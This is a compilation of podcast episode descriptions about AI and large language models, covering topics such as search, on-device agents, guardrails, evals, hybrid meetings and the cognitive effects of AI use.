wondercraft.ai. Create your own studio quality podcast with text as the only input in seconds at app.wondercraft.ai. Issues or feedback? We'd love to hear from you: team@wondercraft.ai
Voices of Search // A Search Engine Optimization (SEO) & Content Marketing Podcast
LLM-based discovery won't replace traditional search within 12 months. Guy Yalif, Webflow's enterprise search strategist, argues that probabilistic and deterministic answers will merge rather than compete, with Google maintaining significant advantages through superior data access and brand recognition. The discussion covers Google's strategic integration of Gemini across productivity platforms and the emerging multi-trillion dollar battle between OpenAI and Google for personalized AI assistant dominance.See Privacy Policy at https://art19.com/privacy and California Privacy Notice at https://art19.com/privacy#do-not-sell-my-info.
Can we have a normal conversation about AI? Brian talks with Meghan Sullivan about the effect of rapidly advancing technology on human dignity and our understanding of the imago Dei. Dr. Brian Doak is an Old Testament scholar and professor.Meghan Sullivan is a decorated scholar and teacher at the University of Notre Dame, where she is professor of philosophy.Check out the opening ND Summit Keynote on the DELTA Framework and the Institute for Ethics and the Common Good.New York Times article: Finding God in the App StoreIf you enjoy listening to the George Fox Talks podcast and would like to watch, too, check out our channel on YouTube! We also have a web page that features all of our podcasts, a sign-up for our weekly email update, and publications from the George Fox University community.
In this episode, we talk about practical guardrails for LLMs with data scientist Nicholas Brathwaite. We focus on how to stop PII leaks, retrieve data, and evaluate safety with real limits. We weigh managed solutions like AWS Bedrock against open-source approaches and discuss when to skip LLMs altogether.• Why guardrails matter for PII, secrets, and access control• Where to place controls across prompt, training, and output• Prompt injection, jailbreaks, and adversarial handling• RAG design with vector DB separation and permissions• Evaluation methods, risk scoring, and cost trade-offs• AWS Bedrock guardrails vs open-source customization• Domain-adapted safety models and policy matching• When deterministic systems beat LLM complexityThis episode is part of our "AI in Practice” series, where we invite guests to talk about the reality of their work in AI. From hands-on development to scientific research, be sure to check out other episodes under this heading in our listings.Related research:Building trustworthy AI: Guardrail technologies and strategies (N. Brathwaite)Nic's GitHubWhat did you think? Let us know.Do you have a question or a discussion topic for the AI Fundamentalists? Connect with them to comment on your favorite topics: LinkedIn - Episode summaries, shares of cited articles, and more. YouTube - Was it something that we said? Good. Share your favorite quotes. Visit our page - see past episodes and submit your feedback! It continues to inspire future episodes.
In this episode, we spoke with Sean Hehir, CEO, and Jonathan Tapson, Chief Development Officer, of BrainChip about neuromorphic computing for edge AI. We covered why event-based processing and sparsity let devices skip 99% of useless sensor data, why joules per inference is a more honest metric than TOPS, how PPA (power, performance, area) guides on-device design, and what it will take to run a compact billion-parameter LLM entirely on device. We also discussed practical use cases like seizure-prediction eyewear, drones for beach safety, and efficiency upgrades in vehicles, plus BrainChip's adoption path via MetaTF and its IP-licensing business model. Key insights: • Neuromorphic efficiency. Event-based compute minimizes data transfer and optimizes for joules per inference, enabling low-power, real-time applications in medical, defense, industrial IoT, and automotive. • LLMs at the edge. Compact silicon and state-based designs are pushing billion-parameter models onto devices, achieving useful performance at much lower power. • Adoption is designed to be straightforward. Models built in standard frameworks can be mapped to BrainChip's Akida platform using MetaTF, with PPA guiding silicon optimization and early evaluation possible through simulation and dev kits. • Compelling use cases. Examples include seizure-prediction smart glasses aiming for all-day battery life in a tiny form factor and drones scanning beaches for distressed swimmers. Most current engagements are pure on-edge, with hybrid edge-plus-cloud possible when appropriate. IoT ONE database: https://www.iotone.com/case-studies The Industrial IoT Spotlight podcast is produced by Asia Growth Partners (AGP): https://asiagrowthpartners.com/
Send us a textIn this episode we interview Mick Essex, Head of Growth Marketing at Powr. He shows how small teams turn repeatable work into time-saving custom GPTs that actually ship. See Powr's custom GPTs.What you'll learn in this episode:The simple rule to decide prompt vs GPT: when you repeat a similar prompt three times, make a GPT instead. How adding a clear knowledge base and iterating with “always” and “never” instructions sharpens results fast. A blueprint for an Article Draft Inspector that checks meta titles, FAQs, and image alt text—scaling edits from a few per day to dozens. An A/B sample sizer that prevents bad data by calculating the right audience and duration before you test. An email spam checker that flags risky words, suggests safer language, and can rewrite the message on the spot. An AEO optimizer that reads page source and suggests schema and copy tweaks to earn AI citations. A GA4 assistant concept that maps LLM citations and ties them to conversions with step-by-step explorations. How “Ninja teams” pair an engineer, PM, marketer, and support to build connectors without bloat. Why many of Mick's GPTs are public—and why the GPT Store options are free. A fast start: list the repetitive, time-heavy tasks, explain the problem and time cost, then ask ChatGPT to convert it into a custom GPT.
On-Device AI Agents in Production: Privacy, Performance, and Scale // MLOps Podcast #340 with NimbleEdge's Varun Khare, Founder/CEO and Neeraj Poddar, Co-founder & CTO.Join the Community: https://go.mlops.community/YTJoinInGet the newsletter: https://go.mlops.community/YTNewsletter// AbstractAI agents are transitioning from experimental stages to performing real work in production; however, they have largely been limited to backend task automation. A critical frontier in this evolution is the on-device AI agent, enabling sophisticated, AI-native experiences directly on mobile and embedded devices. While cloud-based AI faces challenges like constant connectivity demands, increased latency, privacy risks, and high operational costs, on-device breaks through these trade-offs.We'll delve into the practical side of building and deploying AI agents with “DeliteAI”, an open-source on-device AI agentic framework. We'll explore how lightweight Python runtimes facilitate the seamless orchestration of end-to-end workflows directly on devices, allowing AI/ML teams to define data preprocessing, feature computation, model execution, and post-processing logic independently of frontend code. This architecture empowers agents to adapt to varying tasks and user contexts through an ecosystem of tools natively supported on Android/iOS platforms, handling all the permissions, model lifecycles, and many more.// BioVarun KhareVarun is the Founder and CEO of NimbleEdge, an AI startup pioneering privacy-first, on-device intelligence. With an academic foundation in AI and neuroscience from UC Berkeley, MPI Frankfurt, and IIT Kanpur, Varun brings deep expertise at the intersection of technology and science. Before founding NimbleEdge, Varun led open-source projects at OpenMined, focusing on privacy-aware AI, and published research in computer vision.Neeraj PoddarNeeraj Poddar is the Co-founder and CTO at NimbleEdge. Prior to NimbleEdge, he was the Co-founder of Aspen Mesh, VP of Engineering at Solo.io, and led the Istio open source community. He has worked on various aspects of AI, networking, security, and distributed systems over the span of his career. Neeraj focuses on the application of open source technologies across different industries in terms of scalability and security. When not working on AI, you can find him playing racquetball and gaining back the calories spent playing by trying out new restaurants. // Related LinksWebsite: https://www.nimbleedge.com/https://www.nimbleedge.com/blog/why-ai-is-not-working-for-youhttps://www.nimbleedge.com/blog/state-of-on-device-aihttps://www.youtube.com/watch?v=Qqj_Nl2MihEhttps://www.linkedin.com/events/7343237917982527488/comments/~~~~~~~~ ✌️Connect With Us ✌️ ~~~~~~~Catch all episodes, blogs, newsletters, and more: https://go.mlops.community/TYExploreJoin our Slack community [https://go.mlops.community/slack]Follow us on X/Twitter [@mlopscommunity](https://x.com/mlopscommunity) or [LinkedIn](https://go.mlops.community/linkedin)] Sign up for the next meetup: [https://go.mlops.community/register]MLOps Swag/Merch: [https://shop.mlops.community/]Connect with Demetrios on LinkedIn: /dpbrinkmConnect with Varun on LinkedIn: /vkkhare/Connect with Neeraj on LinkedIn: /nrjpoddar/Timestamps:[00:00] On-device AI skepticism[02:47] Word suggestion for AI[06:40] Optimizing unique challenges[13:39] LLM on-device challenges[20:34] Agent overlord tension[23:56] AI app constraints[29:23] Siri limitations and trust gap[32:01] Voice-driven app privacy[35:49] Platform lock-in vs aggregation[42:26] On-device AI optimizations[45:38] Wrap up
У цьому випуску ми розглянули не лише нові продукти Apple, а й ширший контекст технологічних змін. Ведучі проаналізували рішення компанії повернутися від титану до алюмінію в iPhone, обговорили нові функції моніторингу здоров'я в AirPods Pro та можливості синхронного перекладу. Окремий блок присвячено революційному молодіжному руху в Непалі, де завдяки соцмережам і платформі Discord відбулися масштабні політичні зміни. Також ми аналізуємо ініціативу створення національної LLM в Україні, оцінюємо ризики розробки моделей у воєнний час та наголошуємо на проблемах конфіденційності, монополій і неефективного використання бюджетних коштів. Питання збору й використання даних компаніями стають критично важливими, і споживачам варто знати, як саме обробляється їхня інформація.00:23 — новинки від Apple02:37 — якість звуку та розвиток аудіотехнологій04:57 — функції нових пристроїв07:20 — технологія акумуляторів09:10 — роль технологій у політичних рухах15:40 — цифрова трансформація та безпека даних19:30 — зростання ролі ШІ та його наслідки23:04 — розробка національної LLM в Україні31:32 — технічна інфраструктура та дата-центри34:07 — право на ремонт і корпоративний контроль43:38 — конфіденційність даних і права споживачів46:29 — виклики та інновації в ігровій індустрії
Today on the show I share my current thoughts on AI and LLM usage in the automotive repair space as of September 2025. Where are these tools most useful for me? What do you need to know to make the most out of them? What are some of the potential pitfalls? Website- https://autodiagpodcast.com/Facebook Group- https://www.facebook.com/groups/223994012068320/YouTube- https://www.youtube.com/@automotivediagnosticpodcas8832Email- STmobilediag@gmail.comPlease make sure to check out our sponsors!SJ Auto Solutions- https://sjautosolutions.com/Automotive Seminars- https://automotiveseminars.com/L1 Automotive Training- https://www.l1training.com/Autorescue tools- https://autorescuetools.com/
Why you should listenGarima Agrawal bridges the gap between PhD-level AI research and practical consulting applications—she understands both the Formula One engine and how to help you drive the car better.Learn the layered prompting technique that eliminates most hallucinations and turns ChatGPT into a thinking partner rather than a content generator you can't trust.Discover which LLM to use for specific tasks—ChatGPT for analysis, Claude for coding, Gemini for technical research, and Perplexity for citations—so you stop wasting time with the wrong tool.You're using ChatGPT every day, but deep down you don't fully trust it. You've been burned by hallucinations. You watch it confidently give you wrong information, and you're left wondering which parts are reliable and which parts are fiction. You know AI should be making you more productive, but instead you're second-guessing every output and spending more time fact-checking than creating. Meanwhile, you see other consultants talking about Claude, Gemini, Perplexity—and you're not sure if you should be using those instead or if ChatGPT is fine. You're stuck in this loop of knowing AI is powerful but not knowing how to harness it properly. This week, I sat down with Garima Agrawal, who brings a rare combination: PhD-level AI research expertise and real-world consulting experience running her own firm. She breaks down the exact framework that eliminates most hallucinations, reveals which LLM actually performs best for specific consulting tasks, and shares the prompting mistakes that sabotage your results before you even start. If you're ready to stop fighting with AI and start using it as the leverage tool it should be, this conversation gives you the practical roadmap you need.About Garima AgrawalGarima Agrawal is the founder of HumaConn LLC, a consulting firm focused on empowering businesses and investors with tailored AI solutions. At HumaConn, she specializes in designing strategies for effective AI integration—helping clients enhance efficiency, streamline operations, and identify high-potential AI-driven opportunities that bridge innovation with real-world impact.She also serves as Head of AI Models and Services at Minerva CQ, where she leads the development and deployment of real-time, goal-oriented AI systems that power agentic, human-in-the-loop assistance in customer contact centers—boosting engagement and operational performance.Garima holds a Ph.D. in Artificial Intelligence from Arizona State University, where her research focused on making AI knowledge-aware—enabling large language models to reason reliably in specialized domains. Her core expertise includes reducing hallucinations, optimizing retrieval-augmented generation (RAG), and building cost-effective, trustworthy AI pipelines.With over a decade of experience spanning software engineering, data science, and AI leadership, Garima bridges the gap between cutting-edge research and real-world application—helping organizations build AI that delivers meaningful, measurable results.Resources and LinksHumaconn.comGarima's LinkedIn profileGarima's Google Scholar profileChatGPTClaudeGemini
Voices of Search // A Search Engine Optimization (SEO) & Content Marketing Podcast
LLM-based discovery won't replace traditional search within 12 months. Guy Yalif, SEO leader at Webflow, shares insights on how probabilistic and deterministic search approaches will merge rather than compete. The discussion covers Google's strategic advantage through Gemini integration across their ecosystem and the emerging multi-trillion dollar battle between OpenAI and Google for AI assistant dominance.See Privacy Policy at https://art19.com/privacy and California Privacy Notice at https://art19.com/privacy#do-not-sell-my-info.
Cerebrium is a serverless AI infrastructure platform orchestrating CPU and GPU compute for companies building voice agents, healthcare AI systems, manufacturing defect detection, and LLM hosting. The company operates across global markets handling data residency constraints from GDPR to Saudi Arabia's data sovereignty requirements. In a recent episode of Category Visionaries, I sat down with Michael Louis, Co-Founder & CEO of Cerebrium, to explore how they built a high-performance infrastructure business serving enterprise customers with high five-figure to six-figure ACVs while maintaining 99.9%+ SLA requirements. Topics Discussed: Building AI infrastructure before the GPT moment and strategic patience during the hype cycle Scaling a distributed engineering team between Cape Town and NYC with 95% South African talent Partnership-driven revenue generation producing millions in ARR without traditional sales teams AI-powered market engineering achieving 35% LinkedIn reply rates through competitor analysis Technical differentiation through cold start optimization and network latency improvements Revenue expansion through global deployment and regulatory compliance automation GTM Lessons For B2B Founders: Treat go-to-market as a systems engineering problem: Michael reframed traditional sales challenges through an engineering lens, focusing on constraints, scalability, and data-driven optimization. "I try to reframe my go to market problem as an engineering one and try to pick up, okay, like what are my constraints? Like how can I do this, how can it scale?" This systematic approach led to testing 8-10 different strategies, measuring conversion rates, and building automated pipelines rather than relying on manual processes that don't scale. Structure partnerships for partner success before revenue sharing: Cerebrium generates millions in ARR through partners whose sales teams actively upsell their product. Their approach eliminates typical partnership friction: "We typically approach our partners saying like, look, you keep the money you make, we'll keep the money we make. If it goes well, we can talk about like rev share or some other agreement down the line." This removes commission complexity that kills B2B partnerships and allows partners to focus on customer value rather than internal revenue allocation conflicts. Build AI-powered competitive intelligence for outbound at scale: Cerebrium's 35% LinkedIn reply rate comes from scraping competitor followers and LinkedIn engagement, running prospects through qualification agents that check funding status, ICP fit, and technical roles, then generating personalized outreach referencing specific interactions. "We saw you commented on Michael's post about latency in voice. Like, we think that's interesting. Like, here's a case study we did in the voice space." The system processes thousands of prospects while maintaining personalization depth that manual processes can't match. Position infrastructure as revenue expansion, not cost optimization: While dev tools typically focus on developer productivity gains, Cerebrium frames their value proposition around market expansion and revenue growth. "We allow you to deploy your application in many different markets globally... go to market leaders love us and sales leaders because again we open up more markets for them and more revenue without getting their tech team involved." This messaging resonates with revenue stakeholders and justifies higher spending compared to pure cost-reduction positioning. Weaponize regulatory complexity as competitive differentiation: Cerebrium abstracts data sovereignty requirements across multiple jurisdictions - GDPR in Europe, data residency in Saudi Arabia, and other regional compliance frameworks. "As a company to build the infrastructure to have data sovereignty in all these companies and markets, it's a nightmare." By handling this complexity, they create significant switching costs and enable customers to expand internationally without engineering roadmap dependencies, making them essential to sales teams pursuing global accounts. // Sponsors: Front Lines — We help B2B tech companies launch, manage, and grow podcasts that drive demand, awareness, and thought leadership. www.FrontLines.io The Global Talent Co. — We help tech startups find, vet, hire, pay, and retain amazing marketing talent that costs 50-70% less than the US & Europe. www.GlobalTalent.co // Don't Miss: New Podcast Series — How I Hire Senior GTM leaders share the tactical hiring frameworks they use to build winning revenue teams. Hosted by Andy Mowat, who scaled 4 unicorns from $10M to $100M+ ARR and launched Whispered to help executives find their next role. Subscribe here: https://open.spotify.com/show/53yCHlPfLSMFimtv0riPyM
Send us a textDavid Brockler, AI security researcher at NCC Group, explores the rapidly evolving landscape of AI security and the fundamental challenges posed by integrating Large Language Models into applications. We discuss how traditional security approaches fail when dealing with AI components that dynamically change their trustworthiness based on input data.• LLMs present unique security challenges beyond prompt injection or generating harmful content• Traditional security models focusing on component-based permissions don't work with AI systems• "Source-sink chains" are key vulnerability points where attackers can manipulate AI behavior• Real-world examples include data exfiltration through markdown image rendering in AI interfaces• Security "guardrails" are insufficient first-order controls for protecting AI systems• The education gap between security professionals and actual AI threats is substantial• Organizations must shift from component-based security to data flow security when implementing AI• Development teams need to ensure high-trust AI systems only operate with trusted dataWatch for NCC Group's upcoming release of David's Black Hat presentation on new security fundamentals for AI and ML systems. Connect with David on LinkedIn (David Brockler III) or visit the NCC Group research blog at research.nccgroup.com.Support the showFollow the Podcast on Social Media! Tesla Referral Code: https://ts.la/joseph675128 YouTube: https://www.youtube.com/@securityunfilteredpodcast Instagram: https://www.instagram.com/secunfpodcast/Twitter: https://twitter.com/SecUnfPodcast
This show has been flagged as Explicit by the host. Quick-Glance Summary I walk you through an MIT experiment where 54 EEG-capped volunteers wrote essays three ways: pure brainpower, classic search, and ChatGPT assistance. Brain-only writers lit up the most neurons and produced the freshest prose; the ChatGPT crowd churned out near-identical essays, remembered little, and racked up what the researchers dub cognitive debt : the interest you pay later for outsourcing thought today. A bonus “switch” round yanked AI away from the LLM devotees (cue face-plant) and finally let the brain-first team play with the toy (they coped fine), proving skills first, tools second. I spiced the tale with calculator nostalgia, a Belgian med-exam cheating fiasco, and Professor Felienne's forklift-in-the-gym metaphor to land one mantra: *scaffolds beat shortcuts*. We peeked at tech “enshittification” once investors demand returns, whispered “open-source” as the escape hatch, and I dared you to try a two-day test—outline solo, draft with AI, revise solo, then check what you still remember. Net takeaway: keep AI on a leash; let thinking drive, tools navigate . If you think I'm full of digital hot air, record your own rebuttal and prove it. Resources MIT study MIT Media Lab. (2025). Your brain on ChatGPT: Accumulation of cognitive debt. https://www.media.mit.edu/publications/your-brain-on-chatgpt/ Long term consequences (to be honest - pulled these from another list, didn't check all of them) Clemente-Suárez, V. J., Beltrán-Velasco, A. I., Herrero-Roldán, S., Rodriguez-Besteiro, S., Martínez-Guardado, I., Martín-Rodríguez, A., & Tornero-Aguilera, J. F. (2024). Digital device usage and childhood cognitive development: Exploring effects on cognitive abilities. Children , 11(11), 1299. https://pmc.ncbi.nlm.nih.gov/articles/PMC11592547/ Grinschgl, S., Papenmeier, F., & Meyerhoff, H. S. (2021). Consequences of cognitive offloading: Boosting performance but diminishing memory. Quarterly Journal of Experimental Psychology , 74(9), 1477–1496. https://pmc.ncbi.nlm.nih.gov/articles/PMC8358584/ Ward, A. F., Duke, K., Gneezy, A., & Bos, M. W. (2017). Brain drain: The mere presence of one's own smartphone reduces available cognitive capacity. Journal of the Association for Consumer Research , 2(2), 140–154. https://www.journals.uchicago.edu/doi/full/10.1086/691462 Zhang, M., Zhang, X., Wang, H., & Yu, L. (2024). Understanding the influence of digital technology on cognitive development in children. Current Research in Behavioral Sciences , 5, 100224. https://www.sciencedirect.com/science/article/pii/S266724212400099X Risko, E. F., & Dunn, T. L. (2020). Developmental origins of cognitive offloading. Developmental Review , 57, 100921. https://pubmed.ncbi.nlm.nih.gov/32517613/ Ladouceur, R. (2022). Cognitive effects of prolonged continuous human-machine interactions: Implications for digital device users. Behavioral Sciences , 12(8), 240. https://pmc.ncbi.nlm.nih.gov/articles/PMC10790890/ Wong, M. Y., Yin, Z., Kwan, S. C., & Chua, S. E. (2024). Understanding digital dementia and cognitive impact in children and adolescents. Neuroscience Bulletin , 40(7), 628–635. https://pmc.ncbi.nlm.nih.gov/articles/PMC11499077/ Baxter, B. (2025, February 2). Designing AI for human expertise: Preventing cognitive shortcuts. UXmatters . https://www.uxmatters.com/mt/archives/2025/02/designing-ai-for-human-expertise-preventing-cognitive-shortcuts.php Tristan, C., & Thomas, M. (2024). The brain digitalization: It's all happening so fast! Frontiers in Human Dynamics , 4, 1475438. https://www.frontiersin.org/journals/human-dynamics/articles/10.3389/fhumd.2024.1475438/full Sun, Z., & Wang, Y. (2024). Two distinct neural pathways for mechanical versus digital memory aids. NeuroImage , 121, 117245. https://www.sciencedirect.com/science/article/pii/S1053811924004683 Ahmed, S. (2025). Demystifying the new dilemma of brain rot in the digital era. Contemporary Neurology , 19(3), 241–254. https://pmc.ncbi.nlm.nih.gov/articles/PMC11939997/ Redshaw, J., & Adlam, A. (2020). The nature and development of cognitive offloading in children. Child Development Perspectives , 14(2), 120–126. https://srcd.onlinelibrary.wiley.com/doi/10.1111/cdep.12532 Geneva Internet Platform. (2025, June 3). Cognitive offloading and the future of the mind in the AI age. https://dig.watch/updates/cognitive-offloading-and-the-future-of-the-mind-in-the-ai-age Karlsson, G. (2019). Reducing cognitive load on the working memory by externalizing information. DIVA Portal . http://www.diva-portal.org/smash/get/diva2:1327786/FULLTEXT02.pdf Monitask. (2025). What is cognitive offloading? https://www.monitask.com/en/business-glossary/cognitive-offloading Sharma, A., & Watson, S. (2024). Human technology intermediation to reduce cognitive load. Journal of the American Medical Informatics Association , 31(4), 832–841. https://academic.oup.com/jamia/article/31/4/832/7595629 Morgan, P. L., & Risko, E. F. (2021). Re-examining cognitive load measures in real-world learning environments. British Journal of Educational Psychology , 91(3), 993–1013. https://bpspsychub.onlinelibrary.wiley.com/doi/10.1111/bjep.12729 Podcast episodes that inspired some thoughts Felien Hermans (NL) Tech won't save us Screenstrong Families Provide feedback on this episode.
Cisco's Distance Zero rethinks hybrid collaboration with meeting equity, AI at the edge, and cinematic framing that keeps every participant “at eye height”—plus live 3D object discussion with Apple Vision Pro. SVP/GM Snorre Kjesbu explains how Cisco defines “Distance Zero”: everyone gets a true seat at the table—being seen, heard, and included in the room dynamics, whether they're remote or on-site. Subtle but powerful touches—like equalizing participant size and eye level—remove hierarchy cues and improve equity. He frames where hybrid work stands now: bring people together for creativity, mentoring, culture, and serendipity (yes, the coffee line matters), and let focused grind work happen anywhere. For offices to “earn the commute,” rooms must outperform home setups—for those in the room and those remote. Technically, this is enabled by a decade of AI/ML at the edge (a long-running partnership with Nvidia), now combined with newer large-language-model capabilities. Cisco's “cinematic” system behaves like an AI producer—understanding who's speaking and how a conversation moves—while noise suppression can differentiate lawnmowers, dogs, and even prioritize a specific speaker's voice. On accessibility, live translation, captions, and annotation lower barriers for varied accents and learning needs. IT and facilities teams also get AI “superpowers” for reliability and scale since collaboration is now mission-critical. Kjesbu notes that these capabilities are largely available on existing deployments (backward compatible where possible, with cloud assist), and adoption is strong: features like cinematic framing are on in 100% of meetings where available, and LLM-powered summaries, actions, and translation are surging. If this helped clarify the future of hybrid collaboration, like the video, leave a comment with your biggest meeting-equity challenge, and subscribe for more deep dives on accessible, human-centered workplace tech. Cisco Distance Zero, meeting equity, hybrid collaboration, AI at the edge, cinematic framing, Webex meetings, Apple Vision Pro 3D, Nvidia partnership, live translation, captions and annotation, noise suppression, remote work, earn the commute, inclusive meetings, IT manageability, voice optimization, backward compatibility, employee experience, collaboration devices Learn more about your ad choices. Visit megaphone.fm/adchoices
"85% of AI use cases are being evaluated by the engineer who built it saying, 'yep, seemed to work pretty well.' If you're gonna build a system that's going to be critical to the business, that's going to be important that it gets it right, then you can't do that without evaluations." - Craig Wiley Fresh out of the studio, Craig Wiley, Senior Director of Product Management at Databricks who leads Mosaic AI, joins us to discuss the forefront of enterprise AI from model development to deployment at scale. Beginning with his career journey in ML operations, Craig explained how he recognized the critical connection between data and AI layers that could deliver order-of-magnitude acceleration in development cycles. Emphasizing the transition from classical ML operations to LLM operations, he showcased how Databricks' unified platform eliminates training-serving skew through data lineage capabilities and supports both fine-tuning and RAG approaches depending on industrial use case requirements. Highlighting compelling customer success stories including Suncorp's employee productivity platform and AstraZeneca's transformation of 400,000 clinical trial documents into queryable insights, Craig revealed a striking reality about enterprise AI evaluation - that 85% of AI use cases are being evaluated only by the engineers who built them, reinforcing that proper evaluation frameworks remain foundational for trustworthy AI implementation. He concluded by introducing Agent Bricks as Databricks' evaluation-centric approach to building production agents, emphasizing that model flexibility and rigorous testing are essential for enterprises moving from experimentation to production, while sharing his vision that the industry must evolve from the "year of agents" to the "year of evaluation and quality." Episode Highlights: [00:00] Quote of the Day by Craig Wiley [01:21] How Craig Wiley started his work in ML Ops that led him to Databricks [02:43] Data and AI layer connection creates order-of-magnitude acceleration [03:47] Mosaic AI acquisition expanded Gen AI solution capabilities [04:38] Classical ML statistics versus Gen AI evaluation challenges [05:48] Mosaic AI covers end-to-end from data ingestion [07:12] Training-serving skew eliminated through unified platform lineage [08:51] Fine tuning versus RAG depends on use case [10:49] Industrial agents benefit from fine-tuned smaller models [12:44] Common governance scheme covers tables through model access [13:52] Agent Bricks prioritizes accuracy over simplicity alone [15:44] Model flexibility crucial for speed and accuracy optimization [16:54] AB testing different models shows immediate performance differences [17:59] Suncorp and AstraZeneca demonstrate diverse AI applications [19:37] Asia Pacific shows aggressive AI adoption strategies [20:59] CFO approval requires proven agent effectiveness evaluation [22:00] 85% of AI cases evaluated only by building engineer [23:20] Model agnostic approach beats single-vendor AI strategies [24:12] Industry terminology evolves rapidly from RAG to agents [25:39] Customer creativity with governance capabilities inspires product development Profile: Craig Wiley, Senior Director of Product Management at Databricks and Mosaic AI LinkedIn: https://www.linkedin.com/in/craigwiley/ Podcast Information: Bernard Leong hosts and produces the show. The proper credits for the intro and end music are "Energetic Sports Drive." G. Thomas Craig mixed and edited the episode in both video and audio format. Here are the links to watch or listen to our podcast. Analyse Asia Main Site: https://analyse.asia Analyse Asia Spotify: https://open.spotify.com/show/1kkRwzRZa4JCICr2vm0vGl Analyse Asia Apple Podcasts: https://podcasts.apple.com/us/podcast/analyse-asia-with-bernard-leong/id914868245 Analyse Asia LinkedIn: https://www.linkedin.com/company/analyse-asia/ Analyse Asia X (formerly known as Twitter): https://twitter.com/analyseasia Sign Up for Our This Week in Asia Newsletter: https://www.analyse.asia/#/portal/signup Subscribe Newsletter on LinkedIn https://www.linkedin.com/build-relation/newsletter-follow?entityUrn=7149559878934540288
At PyData Berlin, community members and industry voices highlighted how AI and data tooling are evolving across knowledge graphs, MLOps, small-model fine-tuning, explainability, and developer advocacy.- Igor Kvachenok (Leuphana University / ProKube) combined knowledge graphs with LLMs for structured data extraction in the polymer industry, and noted how MLOps is shifting toward LLM-focused workflows.- Selim Nowicki (Distill Labs) introduced a platform that uses knowledge distillation to fine-tune smaller models efficiently, making model specialization faster and more accessible.- Gülsah Durmaz (Architect & Developer) shared her transition from architecture to coding, creating Python tools for design automation and volunteering with PyData through PyLadies.- Yashasvi Misra (Pure Storage) spoke on explainable AI, stressing accountability and compliance, and shared her perspective as both a data engineer and active Python community organizer.- Mehdi Ouazza (MotherDuck) reflected on developer advocacy through video, workshops, and branding, showing how creative communication boosts adoption of open-source tools like DuckDB.Igor KvachenokMaster's student in Data Science at Leuphana University of Lüneburg, writing a thesis on LLM-enhanced data extraction for the polymer industry. Builds RDF knowledge graphs from semi-structured documents and works at ProKube on MLOps platforms powered by Kubeflow and Kubernetes.Connect: https://www.linkedin.com/in/igor-kvachenok/Selim NowickiFounder of Distill Labs, a startup making small-model fine-tuning simple and fast with knowledge distillation. Previously led data teams at Berlin startups like Delivery Hero, Trade Republic, and Tier Mobility. Sees parallels between today's ML tooling and dbt's impact on analytics.Connect: https://www.linkedin.com/in/selim-nowicki/Gülsah DurmazArchitect turned developer, creating Python-based tools for architectural design automation with Rhino and Grasshopper. Active in PyLadies and a volunteer at PyData Berlin, she values the community for networking and learning, and aims to bring ML into architecture workflows.Connect: https://www.linkedin.com/in/gulsah-durmaz/Yashasvi (Yashi) MisraData Engineer at Pure Storage, community organizer with PyLadies India, PyCon India, and Women Techmakers. Advocates for inclusive spaces in tech and speaks on explainable AI, bridging her day-to-day in data engineering with her passion for ethical ML.Connect: https://www.linkedin.com/in/misrayashasvi/Mehdi OuazzaDeveloper Advocate at MotherDuck, formerly a data engineer, now focused on building community and education around DuckDB. Runs popular YouTube channels ("mehdio DataTV" and "MotherDuck") and delivered a hands-on workshop at PyData Berlin. Blends technical clarity with creative storytelling.Connect: https://www.linkedin.com/in/mehd-io/
Bilal Jogi is the marketing director of the Royal Nawaab Pyramid Indian restaurant in Stockport. It's the biggest in the UK. He markets at scale and this podcast contains some of the secrets as to why they have hit the ground running in this iconic building.Summary of the PodcastIntroduction to Bilal Jogi and the Royal Nawab PyramidBilal Jogi, the marketing director for the Royal Nawab Pyramid / Royal Nawaab Group restaurant chain, is introduced. He provides an overview of the group's affordable luxury Indian/Pakistani cuisine concept, featuring a large buffet with live cooking in open kitchens.The iconic Stockport Pyramid restaurantBilal discusses the group's recent takeover and transformation of the iconic Stockport Pyramid building, which had been derelict for years. He shares details on the scale of the project, the local suppliers and craftspeople involved, and the challenges of filling such a large space.Marketing and customer experience strategiesBilal explains the group's innovative marketing approach, focusing on building anticipation and curiosity through social media, influencer partnerships, and providing an exceptional customer experience. He emphasizes the importance of great service, a diverse menu, and creating reasons for customers to return.Expansion plans and target demographicsBilal outlines the group's expansion plans, including a focus on corporate catering and events, as well as potential future acquisitions like a golf course or hotel. He also shares insights into the group's target customer demographics, which are predominantly non-Asian families.The Next 100 Days Podcast Co-HostsGraham ArrowsmithGraham founded Finely Fettled ten years ago to help business owners and marketers market to affluent and high-net-worth customers. He's the founder of MicroYES, a Partner for MeclabsAI, where he introduces AI Agents that you can talk to, that increase engagement, dwell time, leads and conversions. Now, Graham is offering Answer Engine Optimisation that gets you ready to be found by LLM search.Kevin ApplebyKevin specialises in finance transformation and implementing business change. He's the COO of GrowCFO, which provides both community and CPD-accredited training designed to grow the next generation of finance leaders. You can find Kevin on LinkedIn and at kevinappleby.com
Hamel Husain and Shreya Shankar teach the world's most popular course on AI evals and have trained over 2,000 PMs and engineers (including many teams at OpenAI and Anthropic). In this conversation, they demystify the process of developing effective evals, walk through real examples, and share practical techniques that'll help you improve your AI product.What you'll learn:1. WTF evals are2. Why they've become the most important new skill for AI product builders3. A step-by-step walkthrough of how to create an effective eval4. A deep dive into error analysis, open coding, and axial coding5. Code-based evals vs. LLM-as-judge6. The most common pitfalls and how to avoid them7. Practical tips for implementing evals with minimal time investment (30 minutes per week after initial setup)8. Insight into the debate between “vibes” and systematic evals—Brought to you by:Fin—The #1 AI agent for customer serviceDscout—The UX platform to capture insights at every stage: from ideation to productionMercury—The art of simplified finances—Where to find Shreya Shankar• X: https://x.com/sh_reya• LinkedIn: https://www.linkedin.com/in/shrshnk/• Website: https://www.sh-reya.com/• Maven course: https://bit.ly/4myp27m—Where to find Hamel Husain• X: https://x.com/HamelHusain• LinkedIn: https://www.linkedin.com/in/hamelhusain/• Website: https://hamel.dev/• Maven course: https://bit.ly/4myp27m—In this episode, we cover:(00:00) Introduction to Hamel and Shreya(04:57) What are evals?(09:56) Demo: Examining real traces from a property management AI assistant(16:51) Writing notes on errors(23:54) Why LLMs can't replace humans in the initial error analysis(25:16) The concept of a “benevolent dictator” in the eval process(28:07) Theoretical saturation: when to stop(31:39) Using axial codes to help categorize and synthesize error notes(44:39) The results(46:06) Building an LLM-as-judge to evaluate specific failure modes(48:31) The difference between code-based evals and LLM-as-judge(52:10) Example: LLM-as-judge(54:45) Testing your LLM judge against human judgment(01:00:51) Why evals are the new PRDs for AI products(01:05:09) How many evals you actually need(01:07:41) What comes after evals(01:09:57) The great evals debate(1:15:15) Why dogfooding isn't enough for most AI products(01:18:23) OpenAI's Statsig acquisition(1:23:02) The Claude Code controversy and the importance of context(01:24:13) Common misconceptions around evals(1:22:28) Tips and tricks for implementing evals 